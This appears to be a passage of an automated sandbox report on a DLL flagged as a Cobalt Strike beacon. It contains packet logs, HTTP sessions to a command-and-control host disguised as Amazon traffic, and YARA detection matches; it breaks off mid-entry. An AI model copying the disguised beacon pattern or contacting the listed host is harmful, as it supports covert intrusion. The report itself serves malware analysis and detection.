Jan 8, 2023 16:04:02.630168915 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630192041 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630214930 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630234957 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630258083 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630281925 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630302906 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630307913 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630326033 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630351067 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630373001 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630398035 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630407095 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630422115 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630435944 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630451918 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630467892 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630475044 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630497932 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630511045 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630520105 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630541086 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630552053 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630564928 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630580902 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630588055 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630609989 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630616903 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630634069 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630656004 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630664110 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630680084 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630723000 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630723000 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630732059 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630755901 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630764961 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630779982 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630781889 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630801916 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630810022 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630827904 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630848885 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630868912 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630873919 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630891085 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630913019 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630917072 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630937099 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630940914 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.630959034 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630980015 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.630983114 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631002903 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631006956 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631023884 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631040096 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631047010 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631067991 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631076097 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631088972 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631109953 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631122112 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631131887 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631153107 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631155014 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631175041 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631196022 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631201982 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631217957 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631223917 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631239891 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631249905 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631263971 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631284952 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631306887 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631313086 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631330013 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631339073 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631354094 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631365061 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631376982 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631412983 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631462097 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631484032 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631485939 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631505966 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631526947 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631546974 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631550074 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631588936 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631618977 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631668091 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631691933 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631711960 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631731033 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631736040 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631758928 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631761074 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631781101 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631788015 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631804943 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631814957 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631829023 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631850958 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631854057 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631872892 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631886959 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631913900 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631920099 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631937027 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631958008 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.631959915 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.631983042 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.632004023 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.632014036 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.632025957 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.632038116 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.632049084 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.632070065 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.632076025 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.632091045 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.632098913 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.632112026 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.632136106 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.632172108 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.745404959 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.745446920 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.745467901 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.745570898 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.745640039 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.745683908 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.747332096 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.747487068 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.747505903 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.747560024 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.747658014 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.747716904 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.747987032 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748064995 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748140097 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748188019 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748300076 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748404026 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748467922 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748490095 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748514891 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748547077 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748564005 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748584032 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748605013 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748606920 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748625994 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748631001 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748646975 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748653889 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748667955 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748678923 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748689890 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748702049 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748709917 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748730898 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748732090 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748753071 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748774052 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748785973 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748794079 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748811960 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748820066 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748842001 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748845100 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748866081 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748878956 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748887062 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748905897 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748908043 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748929977 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748938084 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748951912 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748972893 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.748975039 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.748992920 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.749011040 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:02.749011040 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.749034882 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.749073029 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.749463081 CET	49686	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:02.863251925 CET	8082	49686	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:03.032263041 CET	49687	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:03.146584034 CET	8082	49687	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:03.146877050 CET	49687	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:03.147871971 CET	49687	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:03.148056030 CET	49687	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:03.261693001 CET	8082	49687	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:03.261727095 CET	8082	49687	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:03.261744022 CET	8082	49687	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:03.261753082 CET	8082	49687	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:03.261774063 CET	8082	49687	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:03.261789083 CET	8082	49687	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:03.261826038 CET	8082	49687	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:03.261975050 CET	49687	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:03.376238108 CET	8082	49687	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:03.380633116 CET	8082	49687	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:03.380666971 CET	8082	49687	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:03.380811930 CET	49687	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:03.381032944 CET	49687	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:03.381078005 CET	49687	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:38.445864916 CET	49688	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:38.560574055 CET	8082	49688	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:38.560714960 CET	49688	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:38.561438084 CET	49688	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:38.675760984 CET	8082	49688	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:38.681183100 CET	8082	49688	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:38.681255102 CET	8082	49688	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:38.681268930 CET	49688	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:38.681324959 CET	49688	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:38.681638002 CET	8082	49688	20.104.209.69	192.168.2.4
Jan 8, 2023 16:04:38.681715965 CET	49688	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:38.713166952 CET	49688	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:04:38.827778101 CET	8082	49688	20.104.209.69	192.168.2.4
Jan 8, 2023 16:05:10.735661030 CET	49689	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:05:10.850111008 CET	8082	49689	20.104.209.69	192.168.2.4
Jan 8, 2023 16:05:10.884565115 CET	49689	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:05:10.885616064 CET	49689	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:05:10.999473095 CET	8082	49689	20.104.209.69	192.168.2.4
Jan 8, 2023 16:05:11.002820015 CET	8082	49689	20.104.209.69	192.168.2.4
Jan 8, 2023 16:05:11.002854109 CET	8082	49689	20.104.209.69	192.168.2.4
Jan 8, 2023 16:05:11.002892971 CET	8082	49689	20.104.209.69	192.168.2.4
Jan 8, 2023 16:05:11.003046989 CET	49689	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:05:11.192933083 CET	49689	8082	192.168.2.4	20.104.209.69
Jan 8, 2023 16:05:11.307514906 CET	8082	49689	20.104.209.69	192.168.2.4

HTTP Request Dependency Graph

https:

20.104.209.69:8082

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49685	20.104.209.69	8082	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:03:30.574161053 CET	92	OUT	GET /broadcast HTTP/1.1 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Origin: https://www.amazon.com Referer: https://www.amazon.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Te: trailers x-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws= User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 20.104.209.69:8082 Connection: Keep-Alive Cache-Control: no-cache
Jan 8, 2023 16:03:30.692807913 CET	92	IN	HTTP/1.1 200 OK Date: Sun, 8 Jan 2023 15:03:21 GMT Content-Type: application/json Access-Control-Allow-Origin: https://www.amazon.com Access-Control-Allow-Methods: GET Access-Control-Allow-Credentials: true X-Amz-Version-Id: null Server: AmazonS3 X-Cache: Hit from cloudfront Content-Length: 1611

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49686	20.104.209.69	8082	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:04:02.156966925 CET	95	OUT	GET /broadcast HTTP/1.1 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Origin: https://www.amazon.com Referer: https://www.amazon.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Te: trailers x-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws= User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 20.104.209.69:8082 Connection: Keep-Alive Cache-Control: no-cache
Jan 8, 2023 16:04:02.285484076 CET	96	IN	HTTP/1.1 200 OK Date: Sun, 8 Jan 2023 15:03:53 GMT Content-Type: application/json Access-Control-Allow-Origin: https://www.amazon.com Access-Control-Allow-Methods: GET Access-Control-Allow-Credentials: true X-Amz-Version-Id: null Server: AmazonS3 X-Cache: Hit from cloudfront Content-Length: 234807

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49687	20.104.209.69	8082	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:04:03.147871971 CET	342	OUT	POST /1/events/com.amazon.csm.csa.prod HTTP/1.1 Accept: / Origin: https://www.amazon.com x-amz-rid: MTI4NDQwODUyNA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 20.104.209.69:8082 Content-Length: 14246 Connection: Keep-Alive Cache-Control: no-cache
Jan 8, 2023 16:04:03.380633116 CET	357	IN	HTTP/1.1 200 OK Date: Sun, 8 Jan 2023 15:03:54 GMT Server: Server Content-Type: application/json Connection: close Access-Control-Allow-Origin: https://www.amazon.com Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date Access-Control-Allow-Credentials: true Vary: Origin,Content-Type,Accept-Encoding,X-Amzn-CDN-Cache,X-Amzn-AX-Treatment,User-Agent Permissions-Policy: interest-cohort=() Content-Length: 86

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49688	20.104.209.69	8082	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:04:38.561438084 CET	359	OUT	GET /broadcast HTTP/1.1 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Origin: https://www.amazon.com Referer: https://www.amazon.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Te: trailers x-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws= User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 20.104.209.69:8082 Connection: Keep-Alive Cache-Control: no-cache
Jan 8, 2023 16:04:38.681183100 CET	359	IN	HTTP/1.1 200 OK Date: Sun, 8 Jan 2023 15:04:29 GMT Content-Type: application/json Access-Control-Allow-Origin: https://www.amazon.com Access-Control-Allow-Methods: GET Access-Control-Allow-Credentials: true X-Amz-Version-Id: null Server: AmazonS3 X-Cache: Hit from cloudfront Content-Length: 1611

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49689	20.104.209.69	8082	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:05:10.885616064 CET	362	OUT	GET /broadcast HTTP/1.1 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Origin: https://www.amazon.com Referer: https://www.amazon.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Te: trailers x-amzn-RequestId: r1+LKI+U+qsTG/S16NjtFpg7cAwjMocPtkvat6tAYwjHqmlGU2emV8Y1lcR09lFCYMc3e/2RPM9832YnRBnrlczEfASqRi1t67GCC61QvdadrQyZZZnmhHuznJl25Bvzanuao77KXJlOWgkmVJTy+plseuTcyuIUt+jek18kyws= User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 20.104.209.69:8082 Connection: Keep-Alive Cache-Control: no-cache
Jan 8, 2023 16:05:11.002820015 CET	363	IN	HTTP/1.1 200 OK Date: Sun, 8 Jan 2023 15:05:02 GMT Content-Type: application/json Access-Control-Allow-Origin: https://www.amazon.com Access-Control-Allow-Methods: GET Access-Control-Allow-Credentials: true X-Amz-Version-Id: null Server: AmazonS3 X-Cache: Hit from cloudfront Content-Length: 1591

Target ID:	0
Start time:	16:03:18
Start date:	08/01/2023
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\8082-x86.dll"
Imagebase:	0x13d0000
File size:	116736 bytes
MD5 hash:	1F562FBF37040EC6C43C8D5EF619EA39
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: CobaltStrike_Sleeve_Beacon_Dll_v4_3_v4_4_v4_5_and_v4_6, Description: Cobalt Strike\'s sleeve/beacon.dll Versions 4.3 and 4.4, Source: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Author: gssincla@google.com Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x, Description: Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, Source: 00000000.00000003.435119690.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, Author: gssincla@google.com Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x, Description: Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, Source: 00000000.00000003.436145653.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, Author: gssincla@google.com Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x, Description: Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from 